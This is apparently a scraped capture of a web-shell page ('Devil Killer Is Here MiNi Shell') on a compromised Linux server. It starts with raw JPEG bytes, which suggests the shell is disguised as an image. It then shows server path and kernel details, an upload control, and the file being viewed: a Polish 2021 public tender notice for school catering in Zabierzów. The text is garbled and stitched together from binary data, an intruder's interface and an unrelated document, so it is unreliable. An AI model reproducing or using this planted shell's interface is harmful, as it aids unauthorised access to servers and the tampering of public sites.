JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211119/0027672401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usługi cateringowej w zakresie dożywiania dzieci uczęszczających do Zespołu Szkolno-Przedszkolnego w Zabierzowie na rok 2022 z przerwami przewidzianymi w organizacji roku szkolnego.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKOLNO - PRZEDSZKOLNY W ZABIERZOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 123140361</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabierzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 2852123</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">spzabierzow1@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zspzabierzow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> opiekuńczo-wychowawczo-edukacyjna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usługi cateringowej w zakresie dożywiania dzieci uczęszczających do Zespołu Szkolno-Przedszkolnego w Zabierzowie na rok 2022 z przerwami przewidzianymi w organizacji roku szkolnego.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0be50d26-47ac-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00276724</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim.<br/>2.	W niniejszym postępowaniu o udzielenie zamówienia publicznego komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz.344 ).<br/>Zamawiający korzysta w niniejszym postępowaniu z:<br/>3.1. miniPortalu https://miniportal.uzp.gov.pl/ (informacja o postępowaniu, szyfrowanie oferty, formularze ePuap) <br/>3.2. ePUAPu https://UGZabierzow/domyslna (formularze do komunikacji, SKŁADANIE OFERT) <br/>3.3. poczty elektronicznej, e.mail: spzabierzow1@wp.pl (korespondencja oprócz Ofert). <br/><br/>jak również przy użyciu:<br/><br/>3.4. Platformy e-Zamówienia https://ezamowienia.gov.pl/pl/ (Ogłoszenie o zamówieniu, informacje o postępowaniu) <br/>3.5. strony internetowej Zamawiającego https://bip.malopolska.pl/zspwzabierzowie (Ogłoszenie o zamówieniu, dokumenty zamówienia, w tym SWZ i Informacje dla Wykonawców)) <br/><br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularz do komunikacji”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji Użytkownika systemu miniPortal-ePUAP dostępnym pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf. <br/>Maksymalny rozmiar pliku po zaszyfrowaniu przesyłanego za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.<br/>6. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone we wskazanej powyżej Instrukcji Użytkownika oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tej Instrukcji. <br/>7. Za datę przekazania Oferty, oświadczenia, o którym mowa w art. 125 ust. 1 uPzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP/w pozostałych przypadkach - mail. <br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniem dot. środków komunikacji elektronicznej. <br/>9. Korespondencja elektroniczna (inna niż Oferta Wykonawcy i załączniki do Oferty) dotycząca pytań odnośnie zapisów SWZ, sposobu złożenia Oferty oraz realizacji zamówienia odbywa się za pomocą poczty elektronicznej e.mail: spzabierzow1@wp.pl.<br/>Wykonawca ma także możliwość komunikowania się elektronicznie za pomocą dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji ). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana <br/>8. Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia: https://miniportal.uzp.gov.pl/ oraz https://bip.malopolska.pl/zspwzabierzowie<br/>9. Zamawiający informuje, że zgodnie z art. 284 ust. 6 uPzp treść zapytań wraz z wyjaśnieniami (bez ujawnienia źródła zapytania) udostępni na stronie internetowej prowadzonego postępowania. Tym samym wszelkie informacje przekazywane Wykonawcom stanowią integralną część specyfikacji warunków zamówienia i dotyczą wszystkich Wykonawców biorących udział w ww. postępowaniu. Wykonawca jest zobowiązany złożyć ofertę uwzględniającą wszelkie zmiany i wyjaśnienia zawarte w Informacjach dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSP.ZAB/1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usługi cateringowej w zakresie dożywiania dzieci uczęszczających do<br/>Zespołu Szkolno-Przedszkolnego w Zabierzowie na rok 2022 z przerwami przewidzianymi w<br/>organizacji roku szkolnego.<br/>1.1. Opis przedmiotu zamówienia :<br/>1.1.1. Przedmiotem zamówienia jest świadczenie usługi cateringowej w zakresie dożywiania<br/>dzieci uczęszczających do Zespołu Szkolno-Przedszkolnego w Zabierzowie na rok 2022 z<br/>przerwami przewidzianymi przepisami o organizacji roku szkolnego.<br/>1.1.2. Zamówienie obejmuje usługę cateringu polegającą na:<br/>a) przygotowaniu i dostarczeniu całodziennego wyżywienia (4 posiłki: śniadanie, owoc, obiad<br/>złożony z zupy, II dania i napoju, podwieczorek) dla dzieci w wieku 3-5 lat do budynku<br/>Przedszkola Samorządowego z Oddziałami Integracyjnymi w Zabierzowie przy ul. Sportowej 15,<br/>b) przygotowaniu, dostarczeniu i wydaniu całodziennego wyżywienia (4 posiłki: śniadanie, owoc,<br/>obiad złożony z zupy, II dania i napoju, podwieczorek) dla dzieci w wieku 3-6 lat, w budynku<br/>Szkoły Podstawowej im. Janusza Korczaka w Zabierzowie przy ul. Szkolnej 50, wraz ze<br/>zmywaniem naczyń,<br/>c) przygotowaniu, dostarczeniu i wydanie obiadów złożonych z zupy, II dania i napoju dla<br/>uczniów w budynku Szkoły Podstawowej im. Janusza Korczaka w Zabierzowie przy ul. Szkolnej<br/>50, wraz ze zmywaniem naczyń,<br/>d) przygotowaniu, dostarczeniu i wydaniu obiadów złożonych z zupy, II dania i napoju dla<br/>uczniów w budynku Szkoły Podstawowej im. Janusza Korczaka w Zabierzowie przy ul.<br/>Kolejowej 15 , wraz ze zmywaniem naczyń.<br/>1.1.3. Posiłki wskazane w ppkt.1.1.2 lit. a) będą dostarczane:<br/>1) śniadanie i owoc o godz. 7.30,<br/>2) obiad i podwieczorek o godz.11.00.<br/>Posiłki wskazane w ppkt.1.1.2 lit. b) będą wydawane w następujących godzinach:<br/>1) śniadanie o godz. 8.30,<br/>2) owoc o godz. 10.00,<br/>3) obiad o godz. 12.00,<br/>4) podwieczorek o godz. 13.30.<br/>Posiłki wskazane w ppkt.1.1.2 lit. c) i d) będą wydawane w godzinach : od 11:55 do 12:10 i od<br/>12:55 do 13:10<br/>1.1.4. Wykonawca ze swojej strony zapewni wydawanie posiłków przez co najmniej 2 osoby.<br/>Posiłki będą dostarczane i wydawane z termosów, pojemników termoizolacyjnych i pojemników<br/>gastronomicznych, zapewniających utrzymanie właściwej temperatury, na zastawie stołowej<br/>porcelanowej. Wykonawca zapewni obsługę zmywania i wyparzania zastawy stołowej w<br/>zakładzie produkcyjnym Wykonawcy. Miejsca wydawania i spożywania posiłków będą<br/>utrzymane w należytej czystości, a pozostałości po spożytym posiłku będą zabierane przez<br/>Wykonawcę tego samego dnia. Brudne naczynia zostają w tym samym dniu zabrane do zakładu<br/>produkcyjnego Wykonawcy.<br/>1.1.5. Produkty w dziennym jadłospisie muszą być zgodne z Rozporządzeniem Ministra Zdrowia<br/>z dnia 26 lipca 2016 roku w sprawie grup środków spożywczych przeznaczonych do sprzedaży<br/>dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać<br/>środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych<br/>jednostkach (Dz. U. z 2016 roku, poz. 1154) oraz musi on obejmować : śniadanie - zupa<br/>mleczna lub potrawy mleczne i mleko - pochodne, kanapka, herbata itp.:, obiad - zupa, drugie<br/>danie: ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.) - dania mięsne np. sztuka<br/>mięsa, udziec kurczaka, pierś z indyka kotlet schabowy, stek z piersi z kurczaka, bitki wołowe,<br/>gulasz itp. Ryba, pierogi, naleśniki, knedle itp. – surówka, kompot lub napój. Podwieczorek –<br/>kanapka lub ciasto i desery mleczne, owoce (w tym sezonowe) kisiel, budyń, herbata lub napój<br/>mleczny itp.: woda mineralna. Napoje przygotowane na miejscu muszą być słodzone cukrem w<br/>ilości nieprzekraczającej 10 g cukrów w 250 ml produktu gotowego do spożycia. Do smażenia<br/>należy używać olej rafinowany o zawartości kwasów wielonasyconych powyżej 50% i zawartości<br/>kwasów wielonasyconych poniżej 40%. Zupy, sosy należy sporządzać z naturalnych składników<br/>bez użycia koncentratów spożywczych z wyłączeniem koncentratów z naturalnych składników.<br/>1.1.6. Wykonawca najpóźniej na 7 dni roboczych przed rozpoczęciem każdego kolejnego<br/>miesiąca świadczenia usług ustali i przedstawi do zatwierdzenia Zamawiającemu propozycje<br/>jadłospisu na okres kolejnego miesiąca. Zamawiający ma prawo do dokonania zmian w jadłospisie, które wiążą w tym względzie Wykonawcę.<br/>1.1.7. Posiłki o jakich mowa powyżej winny być urozmaicone, wysokiej jakości zarówno co do<br/>wartości odżywczej, gramatury jak i estetyki.<br/>1.1.8. Wykonawca dba o właściwy stan dostarczania posiłków (posiłki gorące, świeże, smaczne i<br/>estetyczne) oraz właściwie dobrane do wieku dzieci.<br/>1.1.9. Wykonawca oświadcza, że posiada pełne uprawnienia potrzebne do świadczenia usługi<br/>wydane przez Państwowego Powiatowego Inspektora Sanitarnego.<br/>1.1.10. Stan posiłków i sposób dowożenia musi spełniać wymogi Państwowej Stacji Sanitarno Epidemiologicznej.<br/>1.1.11. W przypadku awarii lub innych nie przewidzianych zdarzeń Wykonawca jest<br/>zobowiązany zapewnić posiłki o nie gorszej jakości oraz zgodne z wymogami żywienia<br/>zbiorowego, które określone zostały w pkt 1.1.5 na swój koszt z innych źródeł.<br/>1.1.12. W cenie oferty należy uwzględnić koszt posiłków standardowych i dietetycznych w razie<br/>konieczności.<br/>1.1.13. W razie szczególnych potrzeb dziecka wynikających z przyczyn zdrowotnych<br/>Wykonawca obowiązany jest dostarczyć posiłek w innym składzie lub bez użycia określonych<br/>produktów czy substancji – według wskazań Zamawiającego.<br/>1.1.14. Cena jednego zestawu winna zawierać koszt przygotowania i dostarczania posiłku.<br/>Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie<br/>produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP.<br/>1.1.15. Posiłki winny spełniać wymogi żywienia zalecane przez Instytut Matki i Dziecka dla dzieci<br/>przedszkolnych w wieku od 3 do 5 lat oraz Instytutu Żywności i Żywienia. Posiłki nie mogą być<br/>przygotowywane z półproduktów.<br/>1.1.16. Ilość posiłków wskazanych w ppkt.1.1.2 lit. a) i b) nie przekroczy w okresie<br/>obowiązywania umowy 34 000. Ilość posiłków wskazanych w ppkt.1.1.2 lit. c) i d) nie przekroczy<br/>w okresie obowiązywania umowy 27 000.<br/>1.1.17. Ilości podane w pkt 1.1.16 są ilościami maksymalnymi. Niezamówienie przez<br/>Zamawiającego posiłków w ilościach wskazanych nie rodzi żadnych roszczeń po stronie<br/>Wykonawcy. Zamawiający zapłaci jedynie za zamówione i faktycznie dostarczone posiłki. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55521100-9 - Usługi rozwożenia posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę, spośród ofert<br/>złożonych w postępowaniu, które nie zostały odrzucone, na podstawie kryteriów oceny ofert<br/>określonych w Rozdziale 19 SWZ. 2. Za najkorzystniejszą zostanie uznana oferta, która uzyska<br/>największą łączną liczbę punktów po zsumowaniu punktów uzyskanych w kryteriach K1-K2. 3.Kryteria<br/>oceny ofert i ich znaczenie: kryterium K1 - Cena oferty brutto - waga 60%; kryterium K2 -<br/>Doświadczenie osoby na stanowisku dietetyka - waga 40%;<br/>4. Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>5. Zamawiający dokona oceny ofert, przyznając punkty w ramach kryteriów, przyjmując zasadę, że 1 punkt = 1%.<br/>6. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>będzie przedstawiać taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze<br/>spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze<br/>ofertę z najniższą ceną.<br/>8. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 7, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego<br/>ofert dodatkowych zawierających nową cenę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby na stanowisku dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>W postępowaniu może wziąć udział Wykonawca, który wykaże, że:<br/>a)	zakład, w którym będą przygotowywane posiłki, wpisany jest do rejestru zakładów podlegających urzędowej kontroli przez organ Państwowej Inspekcji Sanitarnej,<br/>b)	zakład, w którym będą przygotowywane posiłki, posiada ważną decyzję właściwego Państwowego Powiatowego Inspektora Sanitarnego zatwierdzającą zakład jako spełniający wymagania do prowadzenia działalności gastronomicznej. Podstawa prawna art. 4, art. 61 i art. 62 ust. 1 pkt. 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2018 r. poz. 1541 z późn. zm.), art. 31 ust. 2 lit. c rozporządzenia (WE) nr 882/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie kontroli urzędowych przeprowadzanych w celu sprawdzenia zgodności z prawem paszowym i żywnościowym oraz regułami dotyczącymi zdrowia zwierząt i dobrostanu zwierząt (Dz. Urz. UE, L 165 z 30.04.2004 r.) art. 4 rozporządzenia (WE) Parlamentu Europejskiego i Rady nr 852/2004 z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L 139 z 30.04.2004 r.),<br/><br/>Zamawiający określa następujące, minimalne warunki w zakresie zdolności technicznej i zawodowej:<br/>a)	Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), należycie wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również należycie wykonuje, co najmniej dwie usługi polegające na przygotowywaniu i dostarczaniu posiłków o wartości minimum 250 tysięcy złotych brutto każda, z czego co najmniej jedna usługa była lub jest wykonywana na rzecz szkoły podstawowej, przedszkola lub zespołu szkolno-przedszkolnego. <br/> Przez dwie usługi rozumie się usługi świadczone w ramach dwóch odrębnych umów. <br/> W przypadku świadczeń powtarzających się lub ciągłych, które Wykonawca nadal <br/> wykonuje, wymagane jest, aby już zrealizowany zakres usługi (zamówienia) spełniał <br/> wymogi opisanego wyżej warunku.<br/>b) Zamawiający wymaga, aby Wykonawca wykazał, że do realizacji zamówienia będzie dysponuje odpowiednimi samochodami i sprzętem do transportu żywności spełniającymi wymogi sanitarno-higieniczne. 